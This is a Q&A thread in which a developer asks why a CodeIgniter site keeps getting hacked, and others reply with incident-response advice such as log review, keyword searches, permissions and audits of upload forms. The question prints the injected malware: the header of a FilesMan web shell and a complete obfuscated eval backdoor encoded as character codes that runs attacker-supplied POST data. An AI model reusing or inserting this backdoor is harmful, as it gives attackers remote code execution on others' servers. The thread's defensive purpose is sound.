# Codeigniter application getting hacked, code injected in index.php 

Tags: php, security, codeigniter, codeigniter-2, code-injection

I have a codeigniter 2.0.2 project that keeps getting hacked. There are two main issues:

- Malicious code is being added to the start of the `index.php` file
- Rogue files are added to the server

According to the host there are no FTP logs to indicate these files were uploaded.

1. As there are no FTP upload logs related to the rogue files - does this mean it must be an exploit via the site itself e.g. a contact or upload form?
2. The site is on shared hosting - code it be a site on the same server is also getting hacked and this is causing the problems?
3. Would it help if I change the filename of index.php to something else?
4. As the `index.php` is getting modified should I CHMOD it to 644?
5. I've been looking for what the suggested permissions are for codeigniter projects but not sourced any yet. I was thinking 644 across the site apart from the upload/logs directory (777) - does this sound okay?

Code injected to the top of the `index.php` file:

`<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-`

which is then followed by a long preg_replace statement with a long encoded string. This is followed by a second statement:

`if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}`

There is a contact form and a form where a user can upload items using CKFinder 2.0.1. Going to update this and see if that resolves it.

Comment: what php version are you using on the server? is it susceptible to the "?-s" hack? it's posible that the attacker can upload a php script through an upload form somewhere on the site or he uses the "?-s" explot to auto_prepend a remote php file with a payload

Comment: How does the code added to index.php look like?

Comment: if you're on a shared hosting it's also posible that your "neighbours" may be at fault

Comment: If you post the code that would be helpful.

Comment: @VladBalmos using PHP Version 5.2.10. There is an upload form in the admin system but just a contact form that is public.

Comment: @xylar can we see the code to that contact form?

Comment: @Mansfield what code would be helpful? Contact form and upload form?

Comment: @xylar if it is a public website, can you give us the URL?

Comment: @VladBalmos the site has been taken down for the time being.

Comment: @xylar well, all the code would be helpful...but index.php and whatever files process the code in your contact and upload forms would be a good place to start.

Comment: Are you uploading your files to your hosting via Filezilla?

Comment: @Mansfield added the injected coded to the post

Comment: @xylar: That isn't really the issue - that tells us what the exploit is but not how it's getting there. In order to be able to tell that, posting ALL the php code for your site would be helpful. Like others have said, it's entirely possible your code isn't the culprit...but we want to eliminate that possibility, and seeing the whole codebase is the only way to do so.

Comment: @xylar why are you so reluctant when it comes to showing the index.php code and the upload form code? we're only trying to help. Our patience is getting thin...

Comment: @Mansfield ok - I will update my post with the form code

Comment: I've seen a similar issue, then my client had an old CMS running in a subdirectory without his knowledge. Just a thought...

Comment: did you manage to find the problem? what was the cause? just curious

Comment: @VladBalmos the client was happy with the site going back up with out the upload form so that's what we did for the time being. I am going to go through the upload form and look for any holes. I did notice the upload form was using an outdated [CKFinder](http://ckfinder.com/) so updating that to latest version will be the first step. I'll update the ticket with what I find.

Answer (score 11, accepted):

There's a couple of things you can do:

- Check your logfiles for POST requests to files with weird or unfamiliar names, e.g. `.cache_123.php` - these could be backdoor scripts, especially filenames starting with a dot, thus hiding it from the (regular) filesystem.
- Download the complete live site and do a site-wide search for things such as `base64_decode`, `exec`, `preg_replace`, `passthru`, `system`, `shell_exec`, `eval`, `FilesMan`
- Have your entire (downloaded live) site checked by running it through anti-virus software (AVG, Avast, ...)
- Chmod upload directories 775 instead of 777 if possible

Comment: I'd add "eval" to the list of functions you'd want to check.

Comment: @Mansfield yup, have added that one.

Comment: Thanks, just going through these checks now. There was a post request for an unfamiliar name and is associated to the admin upload form - suppose that could be the point of exploit? The code added to index.php had an `eval` which has now been removed and there are no more. AVG says the files are okay.

Comment: Open that file with the unfamiliar name, do you see any suspicious, possibly obfuscated code? I've had to deal with something similar recently, and AVG hadn't found anything either. Turned out there was an obscure file deep in the filesystem which used `preg_replace`to generate a backdoor.

Comment: @xylar Of course the code "added" to index.php had an eval, but that still begs the question of how the malicious code got there in the first place. Once again, posting the actual code would be the most helpful thing to do :)

Comment: @Mansfield they want to be helped but are unwilling to help us help them. geeez

Comment: @Mansfield, if the index file keeps getting compromized, I would reckon the attack is being executed from another, obscured file, no?

Comment: @Mudshark Likely. Which is why posting ALL the code would be ideal.

Comment: @Mudshark that file was removed from the server so doesn't exist any more.

Comment: @xylar Do you have an offline "clean" version of the site? Perhaps you could run a diff between both codebases to see if anything odd comes up.

Comment: @Mansfield difficult to post all the code as it is 50 MB and contains confidential info as well. I think what I might do is re-upload the site without the contact and upload form. If there are no more exploits - I can assume it is one of these.

Comment: @Mudshark unfortunately I don't have access to the dirty files

Comment: @xylar Understandable...could the confidential info be removed? I understand your hesitation to release it publicly (I've had the same hesitation before) but there's a limit to how much help we can be without it...

Comment: @Mansfield Yep sure. That's why I was trying to narrow down what could result in the exploits. If I know it is the forms then I can anonize them. I also just wanted to check I had the systems in place first (e.g. permissions)

Answer (score 2):

I know this is an old thread, but I'd like to add an option to figure out what and where the problem is occurring.

Create a hook which loads each time (doesn't matter at which stage) and dump the $this->input->post() and ->get() to a log file together with the classname and method name.

This way you will see quick enough where the problem started.

Answer (score 0):

I think is far easier to hack through a PHP app rather than an FTP server. Do you have any upload forms ? If you can't go with a VPS, try asking your host to move it to another shared server.

Answer (score 0):

I think you really need to perform a code audit to find where the core vulnerability lies. Unless you run some sort of integrity checks you can't be sure if attacker has put backdoor in other files.

As a quick fix, I would suggest you to install ModSecurity Apache module if possible. Next, look for places in code where file injection could occur (usually file upload functions).